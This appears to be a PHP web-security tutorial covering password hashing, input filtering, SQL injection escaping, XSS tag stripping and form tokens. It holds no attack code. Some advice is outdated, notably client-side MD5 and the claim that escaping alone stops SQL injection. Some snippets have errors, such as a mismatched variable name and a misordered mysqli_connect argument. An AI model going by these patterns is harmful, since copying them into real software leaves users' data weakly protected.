Storing Passwords
Never store password as clear text or in a form that can be
decrypted. On the client side use a hash function in JavaScript
to hash the password before it is sent to the server. Think
of the hash function as a one-way encryption. You can get
JavaScript
MD5 hash functions at this site. On the server side use
the crypt() function to generate a one-way encryption.
$password = crypt('mypassword');
// store the encrypted password in a file and compare the
// encrypted version of the user input with this password
if (crypt($user_input, $password) == $password)
{
echo "Password verified";
}
Do Not Trust Input Data Input data will be coming in through forms. You will be doing two checks on the input data - at the client side using JavaScript and on the sever side using PHP. Always have an upper limit on the amount of data that you are willing to accept. This can be checked on the client side as well as on the server side. Impose what characters are acceptable to you - like alphanumeric and check using regular expressions.
$username = purge ($_POST['username']);
function purge ($str)
{
$purged_str = preg_replace("/\W/", "", $str);
return $purged_str;
}
Prevent SQL Injection
In a SQL Injection attack, a user
sends data through a form that can run as a SQL query on the database.
Use PHP's built-in mysqli_real_escape_string() function as a wrapper
around any user input. This functions escapes characters in the string,
making it impossible to pass in special characters like single and double
quotes and have MySQL run them. This should take care of
SQL Injections if used judiciously.
$link = mysqli_connect ($host, $user, $password, $port); $user = mysqli_real_escape_string ($link, $_POST['user']); $pwd = mysqli_real_escape_string ($link, $_POST['pwd']);
Cross-site Scripting (XSS)
A cross site scripting attack allows a malicious user to enter information
in a form that then inserts client-side script on other users' machines.
Alice has joined an online dating service. In the section "Describe Your
Ideal Date" she posts her answer and a short script that is enclosed
within the script tags. When Bob visits her profile, the script does
not show up on his browser but it runs on Bob's machine. This script
then sends an e-mail to Alice on Bob's real name and e-mail address, and
his session cookie.
If you are accepting user input such as comments to a guestbook that you are then using for others to view be sure to strip anything wrapped in HTML tags. There are several PHP functions that allow you to remove the tags - strip_tags() and htmlentities().
$comments = strip_tags ($_POST['comments']); // now store in file or database // when displaying that comment on someone else's browser echo (htmlentities($comment));
Remote Form Posting
Anyone can visit a Web site, use File->Save As on his browser
and make a local copy of the form. He can then change the action
parameter to point to the fully qualified URL and make any changes to
the form and click the Submit button. The server will accept this form
data as legitimate.
To handle remote form posting generate a token based on a random String and timestamp and place that token into a Session variable and the form. Once the form is submitted check to see if the two tokens match. The token is changed each time the form is created so a would be hacker cannot make a permanent Web form to post unwanted requests to your application.